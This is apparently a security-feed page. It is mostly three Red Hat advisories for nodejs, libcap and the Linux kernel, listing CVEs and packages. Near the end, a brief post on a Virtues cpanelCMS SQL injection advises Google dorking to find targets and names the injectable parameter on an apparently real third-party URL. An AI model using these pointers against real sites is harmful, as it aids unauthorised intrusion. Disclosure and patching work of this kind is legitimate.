Red Hat Security Advisory 2023-4537-01 - Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. The package has been upgraded to a later upstream version: nodejs. Issues addressed include HTTP request smuggling and bypass vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: nodejs:16 security, bug fix, and enhancement update  
Advisory ID:       RHSA-2023:4537-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4537  
Issue date:        2023-08-08  
CVE Names:         CVE-2023-30581 CVE-2023-30588 CVE-2023-30589   
                   CVE-2023-30590   
=====================================================================

1. Summary:

An update for the nodejs:16 module is now available for Red Hat Enterprise  
Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Node.js is a software development platform for building fast and scalable  
network applications in the JavaScript programming language.

The package has been upgraded to a later upstream version: nodejs  
(16.20.1). (BZ#2223678, BZ#2223680, BZ#2223682, BZ#2223684, BZ#2223686,  
BZ#2223688)

Security Fix(es):

* nodejs: mainModule.proto bypass experimental policy mechanism  
(CVE-2023-30581)

* nodejs: process interuption due to invalid Public Key information in x509  
certificates (CVE-2023-30588)

* nodejs: HTTP Request Smuggling via Empty headers separated by CR  
(CVE-2023-30589)

* nodejs: DiffieHellman do not generate keys after setting a private key  
(CVE-2023-30590)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2219824 - CVE-2023-30581 nodejs: mainModule.proto bypass experimental policy mechanism  
2219838 - CVE-2023-30588 nodejs: process interuption due to invalid Public Key information in x509 certificates  
2219841 - CVE-2023-30589 nodejs: HTTP Request Smuggling via Empty headers separated by CR  
2219842 - CVE-2023-30590 nodejs: DiffieHellman do not generate keys after setting a private key  
2223678 - nodejs:16/nodejs: Rebase to the latest Nodejs 16 release [rhel-8] [rhel-8.8.0.z]  
2223688 - nodejs:16/nodejs: Remove /usr/etc/npmrc softlink. [rhel-8] [rhel-8.8.0.z]

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
nodejs-16.20.1-1.module+el8.8.0+19440+ee8dbee5.src.rpm  
nodejs-nodemon-2.0.20-3.module+el8.8.0+19038+6f60344f.src.rpm  
nodejs-packaging-25-1.module+el8.5.0+10992+fac5fe06.src.rpm

aarch64:  
nodejs-16.20.1-1.module+el8.8.0+19440+ee8dbee5.aarch64.rpm  
nodejs-debuginfo-16.20.1-1.module+el8.8.0+19440+ee8dbee5.aarch64.rpm  
nodejs-debugsource-16.20.1-1.module+el8.8.0+19440+ee8dbee5.aarch64.rpm  
nodejs-devel-16.20.1-1.module+el8.8.0+19440+ee8dbee5.aarch64.rpm  
nodejs-full-i18n-16.20.1-1.module+el8.8.0+19440+ee8dbee5.aarch64.rpm  
npm-8.19.4-1.16.20.1.1.module+el8.8.0+19440+ee8dbee5.aarch64.rpm

noarch:  
nodejs-docs-16.20.1-1.module+el8.8.0+19440+ee8dbee5.noarch.rpm  
nodejs-nodemon-2.0.20-3.module+el8.8.0+19038+6f60344f.noarch.rpm  
nodejs-packaging-25-1.module+el8.5.0+10992+fac5fe06.noarch.rpm

ppc64le:  
nodejs-16.20.1-1.module+el8.8.0+19440+ee8dbee5.ppc64le.rpm  
nodejs-debuginfo-16.20.1-1.module+el8.8.0+19440+ee8dbee5.ppc64le.rpm  
nodejs-debugsource-16.20.1-1.module+el8.8.0+19440+ee8dbee5.ppc64le.rpm  
nodejs-devel-16.20.1-1.module+el8.8.0+19440+ee8dbee5.ppc64le.rpm  
nodejs-full-i18n-16.20.1-1.module+el8.8.0+19440+ee8dbee5.ppc64le.rpm  
npm-8.19.4-1.16.20.1.1.module+el8.8.0+19440+ee8dbee5.ppc64le.rpm

s390x:  
nodejs-16.20.1-1.module+el8.8.0+19440+ee8dbee5.s390x.rpm  
nodejs-debuginfo-16.20.1-1.module+el8.8.0+19440+ee8dbee5.s390x.rpm  
nodejs-debugsource-16.20.1-1.module+el8.8.0+19440+ee8dbee5.s390x.rpm  
nodejs-devel-16.20.1-1.module+el8.8.0+19440+ee8dbee5.s390x.rpm  
nodejs-full-i18n-16.20.1-1.module+el8.8.0+19440+ee8dbee5.s390x.rpm  
npm-8.19.4-1.16.20.1.1.module+el8.8.0+19440+ee8dbee5.s390x.rpm

x86_64:  
nodejs-16.20.1-1.module+el8.8.0+19440+ee8dbee5.x86_64.rpm  
nodejs-debuginfo-16.20.1-1.module+el8.8.0+19440+ee8dbee5.x86_64.rpm  
nodejs-debugsource-16.20.1-1.module+el8.8.0+19440+ee8dbee5.x86_64.rpm  
nodejs-devel-16.20.1-1.module+el8.8.0+19440+ee8dbee5.x86_64.rpm  
nodejs-full-i18n-16.20.1-1.module+el8.8.0+19440+ee8dbee5.x86_64.rpm  
npm-8.19.4-1.16.20.1.1.module+el8.8.0+19440+ee8dbee5.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-30581  
https://access.redhat.com/security/cve/CVE-2023-30588  
https://access.redhat.com/security/cve/CVE-2023-30589  
https://access.redhat.com/security/cve/CVE-2023-30590  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0k84AAoJENzjgjWX9erEzysP/iBhUkeHOMU20XEmmmb6mwo9  
4dGhBTXLxz8vZBF9XSi+gEmy3cj/uIMmnmv7pztUmQZnsF0OTBlHxigPQtDkJ1dU  
GKeETuH1hsURIml4zhbR/HjHPTnaBEqexfInAj+ytYiagOv9kq4YWdJn98Ujb26z  
6PFQ2O/n++FK3HX57CTDkj9xi/n4gJIqke7R1a/EgJbfHd5YBWKMGz0TFP3NlfMq  
fEbT4EXkt2X9rBhUZeqAZugdp/BxYHmCbaZXtlB66H3bdPn7ocuD7DT+h4nxQvtw  
Sg7Ptwf4b7Z0486RpJfqnyWbLaQxKW70/N6FMF6xC6IpoZNkaKz529sgVyDceIfG  
VozYM99dGkc72/IQZQwRiqqSHQETaqSDmndEKvS0hPElKr6netjkibeNJSbbCNqR  
dyny135XIoJ6LqV9zssySKvXClxJg5TG3cJCK5KkWP+KT9cQFUynsPullUSLBqsr  
1hiVXJNWUuFlvPvrO9Yv6qjCe6v7GlVy9Og1cLP8YL37SIkco/78XpEvh/qzrld0  
UCAVNjHCFS7qUjH2Hd/Mdib4vBnYLZcCCE/dzE9vm71VnDulQz7nHH/2fKGSXrHO  
6awqcccjpJIS8lOsQ3nJ1P2Iup9W/ubInCOruyNwF8qGlLI+tspOmmXUrSnoqYdK  
/89SfONOZeeeOQkWmO05  
=bO5t  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4537-01

Red Hat Security Advisory 2023-4524-01 - Libcap is a library for getting and setting POSIX.1e draft 15 capabilities. Issues addressed include integer overflow and memory leak vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: libcap security update  
Advisory ID:       RHSA-2023:4524-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4524  
Issue date:        2023-08-08  
CVE Names:         CVE-2023-2602 CVE-2023-2603   
=====================================================================

1. Summary:

An update for libcap is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Libcap is a library for getting and setting POSIX.1e (formerly POSIX 6)  
draft 15 capabilities.

Security Fix(es):

* libcap: Integer Overflow in _libcap_strdup() (CVE-2023-2603)

* libcap: Memory Leak on pthread_create() Error (CVE-2023-2602)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2209113 - CVE-2023-2603 libcap: Integer Overflow in _libcap_strdup()  
2209114 - CVE-2023-2602 libcap: Memory Leak on pthread_create() Error

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
libcap-2.48-5.el8_8.src.rpm

aarch64:  
libcap-2.48-5.el8_8.aarch64.rpm  
libcap-debuginfo-2.48-5.el8_8.aarch64.rpm  
libcap-debugsource-2.48-5.el8_8.aarch64.rpm  
libcap-devel-2.48-5.el8_8.aarch64.rpm

ppc64le:  
libcap-2.48-5.el8_8.ppc64le.rpm  
libcap-debuginfo-2.48-5.el8_8.ppc64le.rpm  
libcap-debugsource-2.48-5.el8_8.ppc64le.rpm  
libcap-devel-2.48-5.el8_8.ppc64le.rpm

s390x:  
libcap-2.48-5.el8_8.s390x.rpm  
libcap-debuginfo-2.48-5.el8_8.s390x.rpm  
libcap-debugsource-2.48-5.el8_8.s390x.rpm  
libcap-devel-2.48-5.el8_8.s390x.rpm

x86_64:  
libcap-2.48-5.el8_8.i686.rpm  
libcap-2.48-5.el8_8.x86_64.rpm  
libcap-debuginfo-2.48-5.el8_8.i686.rpm  
libcap-debuginfo-2.48-5.el8_8.x86_64.rpm  
libcap-debugsource-2.48-5.el8_8.i686.rpm  
libcap-debugsource-2.48-5.el8_8.x86_64.rpm  
libcap-devel-2.48-5.el8_8.i686.rpm  
libcap-devel-2.48-5.el8_8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-2602  
https://access.redhat.com/security/cve/CVE-2023-2603  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0k8yAAoJENzjgjWX9erEIT8QAIUP4xiMtybHMFjjcyV95EkW  
cE5jP6Sq++09+SXnim0DzCign4Gr5J3uLpdLigKiq+apjSb+7wApS79FmtnOYavi  
E5KTkvCuEo6g0Zh367ZLpUH59ZZcWwHk9Z2/FQC6ehRWwPnEaS43DbrsJWslecYY  
4dakirQGTXmzFnbksnH/CyHOrGh+By5B3wPZWAzo7BwhfZfPvpTcGALUvnNd+CmD  
jY6kWhFw/JNKA8ux/NRPlQx/qN9Ec3dC5F990Pzp4YNLo2xS3E8yxEEvh90sihFq  
MUqIwC1s6xNuW3vx+UWmxm2+RwcmLyWaJAVbgZpk/C6H4q6/XYmGDuJizFOCLuiw  
JxrTDRNu3siZwdwlqIlJtydV6G4kXn1zQw5tFau5kaI5xmUamSI3toNoVF7X+A2i  
tIRTxYfG56uc5UlaWXli0hyzCiL+MKRRS+ybjZ2O7S5xto35JsdywQsB0Zm4E2yD  
lTmtcDFA2apLUDxChURDxA0/OCXJJbAhtoYk25gkfwEhyHGT1/BlKFUFMAZY0RxR  
kZPFoAiU9pjdMJQtkihC633K4UPbF85eZ5uytTI8uTlmNgIYP2Or7xpwg9txIkhA  
CDgtTpOjrFSrEHZB7F/wJktZ64jP8perBGc1SAw915nTIXvZhA1UU3ky/pK/xEA+  
W836zfh1wkjr8qFgg8Pm  
=03n6  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4524-01

Red Hat Security Advisory 2023-4517-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include out of bounds access, out of bounds write, privilege escalation, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security and bug fix update  
Advisory ID:       RHSA-2023:4517-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4517  
Issue date:        2023-08-08  
CVE Names:         CVE-2022-42896 CVE-2023-1281 CVE-2023-1829   
                   CVE-2023-2124 CVE-2023-2194 CVE-2023-2235   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in  
net/bluetooth/l2cap_core.c (CVE-2022-42896)

* kernel: tcindex: use-after-free vulnerability in traffic control index  
filter allows privilege escalation (CVE-2023-1281)

* kernel: Use-after-free vulnerability in the Linux Kernel traffic control  
index filter (CVE-2023-1829)

* kernel: use-after-free vulnerability in the perf_group_detach function of  
the Linux Kernel Performance Events (CVE-2023-2235)

* kernel: OOB access in the Linux kernel's XFS subsystem (CVE-2023-2124)

* kernel: i2c: out-of-bounds write in xgene_slimpro_i2c_xfer()  
(CVE-2023-2194)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* simultaneous writes to a page on xfs can result in zero-byte data  
(BZ#2184101)

* RHEL 8.4 - kernel: fix __clear_user() inline assembly constraints  
(BZ#2192602)

* LPAR is crashed by Phyp when doing DLPAR CPU operations (BZ#2193375)

* ice: ptp4l cpu usage spikes (BZ#2203285)

* Kernel - Significant performance drop for getrandom system call when FIPS  
is enabled (compared to RHEL 8.x for all x < 6.z) (BZ#2208127)

* macvlan: backports from upstream (BZ#2209686)

* Intel 8.9 BUG VROC: Pull VMD secondary bus reset patch (BZ#2211198)

* Incorrect target abort handling causes iscsi deadlock (BZ#2211494)

* swap deadlock when attempt to charge a page to a cgroup stalls waiting on  
I/O plugged on another task in swap code (BZ#2211513)

* BUG_ON "kernel BUG at mm/rmap.c:1041!" in __page_set_anon_rmap() when  
vma->anon_vma==NULL (BZ#2211658)

* RHEL 8.9: IPMI updates and bug fixes (BZ#2211667)

* RHEL 8.6 opening console with mkvterm on novalink terminal fails due to  
drmgr reporting failure (L3:) (BZ#2212373)

* RHEL 8.8 - P10 DD2.0: Wrong numa_node is assigned to vpmem device  
(BZ#2212451)

* RHEL 8.8 beta: Occasional stall during initialization of ipmi_msghandler  
(BZ#2213189)

* ESXi RHEL 8: Haswell generation CPU are impacted with performance due to  
IBRS (BZ#2213366)

* xen: fix section mismatch error with xen_callback_vector() and  
alloc_intr_gate() (BZ#2214281)

* jitter: Fix RCT/APT health test during initialization (BZ#2215079)

* aacraid misses interrupts when a CPU is disabled resulting in scsi  
timeouts and the adapter being unusable until reboot. (BZ#2216498)

* Hyper-V RHEL 8: Fix VM crash/hang Issues due to fast VF add/remove events  
(BZ#2216543)

* rbd: avoid fast-diff corruption in snapshot-based mirroring [8.9]  
(BZ#2216769)

* Regression of 3b8cc6298724 ("blk-cgroup: Optimize blkcg_rstat_flush()")  
(BZ#2220810)

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2147364 - CVE-2022-42896 kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in net/bluetooth/l2cap_core.c  
2181847 - CVE-2023-1281 kernel: tcindex: use-after-free vulnerability in traffic control index filter allows privilege escalation  
2187439 - CVE-2023-2124 kernel: OOB access in the Linux kernel's XFS subsystem  
2188396 - CVE-2023-2194 kernel: i2c: out-of-bounds write in xgene_slimpro_i2c_xfer()  
2188470 - CVE-2023-1829 kernel: Use-after-free vulnerability in the Linux Kernel traffic control index filter  
2192589 - CVE-2023-2235 kernel: use-after-free vulnerability in the perf_group_detach function of the Linux Kernel Performance Events

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
kernel-4.18.0-477.21.1.el8_8.src.rpm

aarch64:  
bpftool-4.18.0-477.21.1.el8_8.aarch64.rpm  
bpftool-debuginfo-4.18.0-477.21.1.el8_8.aarch64.rpm  
kernel-4.18.0-477.21.1.el8_8.aarch64.rpm  
kernel-core-4.18.0-477.21.1.el8_8.aarch64.rpm  
kernel-cross-headers-4.18.0-477.21.1.el8_8.aarch64.rpm  
kernel-debug-4.18.0-477.21.1.el8_8.aarch64.rpm  
kernel-debug-core-4.18.0-477.21.1.el8_8.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-477.21.1.el8_8.aarch64.rpm  
kernel-debug-devel-4.18.0-477.21.1.el8_8.aarch64.rpm  
kernel-debug-modules-4.18.0-477.21.1.el8_8.aarch64.rpm  
kernel-debug-modules-extra-4.18.0-477.21.1.el8_8.aarch64.rpm  
kernel-debuginfo-4.18.0-477.21.1.el8_8.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-477.21.1.el8_8.aarch64.rpm  
kernel-devel-4.18.0-477.21.1.el8_8.aarch64.rpm  
kernel-headers-4.18.0-477.21.1.el8_8.aarch64.rpm  
kernel-modules-4.18.0-477.21.1.el8_8.aarch64.rpm  
kernel-modules-extra-4.18.0-477.21.1.el8_8.aarch64.rpm  
kernel-tools-4.18.0-477.21.1.el8_8.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-477.21.1.el8_8.aarch64.rpm  
kernel-tools-libs-4.18.0-477.21.1.el8_8.aarch64.rpm  
perf-4.18.0-477.21.1.el8_8.aarch64.rpm  
perf-debuginfo-4.18.0-477.21.1.el8_8.aarch64.rpm  
python3-perf-4.18.0-477.21.1.el8_8.aarch64.rpm  
python3-perf-debuginfo-4.18.0-477.21.1.el8_8.aarch64.rpm

noarch:  
kernel-abi-stablelists-4.18.0-477.21.1.el8_8.noarch.rpm  
kernel-doc-4.18.0-477.21.1.el8_8.noarch.rpm

ppc64le:  
bpftool-4.18.0-477.21.1.el8_8.ppc64le.rpm  
bpftool-debuginfo-4.18.0-477.21.1.el8_8.ppc64le.rpm  
kernel-4.18.0-477.21.1.el8_8.ppc64le.rpm  
kernel-core-4.18.0-477.21.1.el8_8.ppc64le.rpm  
kernel-cross-headers-4.18.0-477.21.1.el8_8.ppc64le.rpm  
kernel-debug-4.18.0-477.21.1.el8_8.ppc64le.rpm  
kernel-debug-core-4.18.0-477.21.1.el8_8.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-477.21.1.el8_8.ppc64le.rpm  
kernel-debug-devel-4.18.0-477.21.1.el8_8.ppc64le.rpm  
kernel-debug-modules-4.18.0-477.21.1.el8_8.ppc64le.rpm  
kernel-debug-modules-extra-4.18.0-477.21.1.el8_8.ppc64le.rpm  
kernel-debuginfo-4.18.0-477.21.1.el8_8.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-477.21.1.el8_8.ppc64le.rpm  
kernel-devel-4.18.0-477.21.1.el8_8.ppc64le.rpm  
kernel-headers-4.18.0-477.21.1.el8_8.ppc64le.rpm  
kernel-modules-4.18.0-477.21.1.el8_8.ppc64le.rpm  
kernel-modules-extra-4.18.0-477.21.1.el8_8.ppc64le.rpm  
kernel-tools-4.18.0-477.21.1.el8_8.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-477.21.1.el8_8.ppc64le.rpm  
kernel-tools-libs-4.18.0-477.21.1.el8_8.ppc64le.rpm  
perf-4.18.0-477.21.1.el8_8.ppc64le.rpm  
perf-debuginfo-4.18.0-477.21.1.el8_8.ppc64le.rpm  
python3-perf-4.18.0-477.21.1.el8_8.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-477.21.1.el8_8.ppc64le.rpm

s390x:  
bpftool-4.18.0-477.21.1.el8_8.s390x.rpm  
bpftool-debuginfo-4.18.0-477.21.1.el8_8.s390x.rpm  
kernel-4.18.0-477.21.1.el8_8.s390x.rpm  
kernel-core-4.18.0-477.21.1.el8_8.s390x.rpm  
kernel-cross-headers-4.18.0-477.21.1.el8_8.s390x.rpm  
kernel-debug-4.18.0-477.21.1.el8_8.s390x.rpm  
kernel-debug-core-4.18.0-477.21.1.el8_8.s390x.rpm  
kernel-debug-debuginfo-4.18.0-477.21.1.el8_8.s390x.rpm  
kernel-debug-devel-4.18.0-477.21.1.el8_8.s390x.rpm  
kernel-debug-modules-4.18.0-477.21.1.el8_8.s390x.rpm  
kernel-debug-modules-extra-4.18.0-477.21.1.el8_8.s390x.rpm  
kernel-debuginfo-4.18.0-477.21.1.el8_8.s390x.rpm  
kernel-debuginfo-common-s390x-4.18.0-477.21.1.el8_8.s390x.rpm  
kernel-devel-4.18.0-477.21.1.el8_8.s390x.rpm  
kernel-headers-4.18.0-477.21.1.el8_8.s390x.rpm  
kernel-modules-4.18.0-477.21.1.el8_8.s390x.rpm  
kernel-modules-extra-4.18.0-477.21.1.el8_8.s390x.rpm  
kernel-tools-4.18.0-477.21.1.el8_8.s390x.rpm  
kernel-tools-debuginfo-4.18.0-477.21.1.el8_8.s390x.rpm  
kernel-zfcpdump-4.18.0-477.21.1.el8_8.s390x.rpm  
kernel-zfcpdump-core-4.18.0-477.21.1.el8_8.s390x.rpm  
kernel-zfcpdump-debuginfo-4.18.0-477.21.1.el8_8.s390x.rpm  
kernel-zfcpdump-devel-4.18.0-477.21.1.el8_8.s390x.rpm  
kernel-zfcpdump-modules-4.18.0-477.21.1.el8_8.s390x.rpm  
kernel-zfcpdump-modules-extra-4.18.0-477.21.1.el8_8.s390x.rpm  
perf-4.18.0-477.21.1.el8_8.s390x.rpm  
perf-debuginfo-4.18.0-477.21.1.el8_8.s390x.rpm  
python3-perf-4.18.0-477.21.1.el8_8.s390x.rpm  
python3-perf-debuginfo-4.18.0-477.21.1.el8_8.s390x.rpm

x86_64:  
bpftool-4.18.0-477.21.1.el8_8.x86_64.rpm  
bpftool-debuginfo-4.18.0-477.21.1.el8_8.x86_64.rpm  
kernel-4.18.0-477.21.1.el8_8.x86_64.rpm  
kernel-core-4.18.0-477.21.1.el8_8.x86_64.rpm  
kernel-cross-headers-4.18.0-477.21.1.el8_8.x86_64.rpm  
kernel-debug-4.18.0-477.21.1.el8_8.x86_64.rpm  
kernel-debug-core-4.18.0-477.21.1.el8_8.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-477.21.1.el8_8.x86_64.rpm  
kernel-debug-devel-4.18.0-477.21.1.el8_8.x86_64.rpm  
kernel-debug-modules-4.18.0-477.21.1.el8_8.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-477.21.1.el8_8.x86_64.rpm  
kernel-debuginfo-4.18.0-477.21.1.el8_8.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-477.21.1.el8_8.x86_64.rpm  
kernel-devel-4.18.0-477.21.1.el8_8.x86_64.rpm  
kernel-headers-4.18.0-477.21.1.el8_8.x86_64.rpm  
kernel-modules-4.18.0-477.21.1.el8_8.x86_64.rpm  
kernel-modules-extra-4.18.0-477.21.1.el8_8.x86_64.rpm  
kernel-tools-4.18.0-477.21.1.el8_8.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-477.21.1.el8_8.x86_64.rpm  
kernel-tools-libs-4.18.0-477.21.1.el8_8.x86_64.rpm  
perf-4.18.0-477.21.1.el8_8.x86_64.rpm  
perf-debuginfo-4.18.0-477.21.1.el8_8.x86_64.rpm  
python3-perf-4.18.0-477.21.1.el8_8.x86_64.rpm  
python3-perf-debuginfo-4.18.0-477.21.1.el8_8.x86_64.rpm

Red Hat Enterprise Linux CRB (v. 8):

aarch64:  
bpftool-debuginfo-4.18.0-477.21.1.el8_8.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-477.21.1.el8_8.aarch64.rpm  
kernel-debuginfo-4.18.0-477.21.1.el8_8.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-477.21.1.el8_8.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-477.21.1.el8_8.aarch64.rpm  
kernel-tools-libs-devel-4.18.0-477.21.1.el8_8.aarch64.rpm  
perf-debuginfo-4.18.0-477.21.1.el8_8.aarch64.rpm  
python3-perf-debuginfo-4.18.0-477.21.1.el8_8.aarch64.rpm

ppc64le:  
bpftool-debuginfo-4.18.0-477.21.1.el8_8.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-477.21.1.el8_8.ppc64le.rpm  
kernel-debuginfo-4.18.0-477.21.1.el8_8.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-477.21.1.el8_8.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-477.21.1.el8_8.ppc64le.rpm  
kernel-tools-libs-devel-4.18.0-477.21.1.el8_8.ppc64le.rpm  
perf-debuginfo-4.18.0-477.21.1.el8_8.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-477.21.1.el8_8.ppc64le.rpm

x86_64:  
bpftool-debuginfo-4.18.0-477.21.1.el8_8.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-477.21.1.el8_8.x86_64.rpm  
kernel-debuginfo-4.18.0-477.21.1.el8_8.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-477.21.1.el8_8.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-477.21.1.el8_8.x86_64.rpm  
kernel-tools-libs-devel-4.18.0-477.21.1.el8_8.x86_64.rpm  
perf-debuginfo-4.18.0-477.21.1.el8_8.x86_64.rpm  
python3-perf-debuginfo-4.18.0-477.21.1.el8_8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42896  
https://access.redhat.com/security/cve/CVE-2023-1281  
https://access.redhat.com/security/cve/CVE-2023-1829  
https://access.redhat.com/security/cve/CVE-2023-2124  
https://access.redhat.com/security/cve/CVE-2023-2194  
https://access.redhat.com/security/cve/CVE-2023-2235  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0k8yAAoJENzjgjWX9erEBnAQAJYE/kuoaCmyvHq8Ejon2ItK  
wPzh3Rhm5jlOPbAOmbXcFQKmu9vHNZpv34IDgk37FvWY2xElVgOlbeFiu/GGxvOq  
X9f4Sm3j0F+emnatAdNRvhIJ1igargUf0BqwhaHjirl0OEtfw9yEVPU0yuAVIDEE  
FgeBAWpT9jN01610xPPCS/aV18Q1P36CQreVhCRbHgkDS89BWmjJIG77Dws2L01m  
Hg7s38T4hJr10mUpsQAL+RgM24l3oLUyAFC/1WU32l4UyTC8rUSd1A/gmZ/jnpVL  
lmaph5sCl+DwCgtICKOr0nPSyO40tutDOjm4Mq5e1mcbJp+HiVPYcJ0n0hokK766  
qaJ4QjQvDcXVa2GMf7bm+ZzSF7PSOK/M/eypKd8NzhNZQvF/GelwaDPIRkfAEs8Y  
zqv2IcR1AfJEGnVEWdU2OauXxN9sQZ8V0s3uJoeUU3QKSJas0R3VbpRkdJCLsAiJ  
wTQlYcD6EQJA3PV4X5VZUgv2HjmjjxdIzYduYZcIZOUjqUK2rhdg2M4Gnq9z7fsd  
pt27Y3gB1UR0iG0UCQoTaMtOE2KBi7V4Ale3xYicWZb5n1eevNX9NWA9l+WDtN/0  
eFhrKTxIrZe22rnlj+0IwP2DRltnbFmJAPo4066udIQhHDRvwQopwGHnoO7nCGsp  
VT0aneVeYrjA/6a4CkJ/  
=ZQT4  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4517-01

Virtues cpanelCMS version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Virtues cpanelCMS v1.0 sql injection Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : http://www.virtues.ag/                                                                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /index/noticia_integra.php?id_clipping=[+] http://wospluralorg/index/noticia_integra.php?id_clipping= inject herGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Virtues cpanelCMS 1.0 SQL Injection

Voodoo Chat version 1.3 suffers from a cross site scripting vulnerability.

**Voodoo Chat 1.3 Cross Site Scripting**

Posted Aug 8, 2023

Authored by indoushka

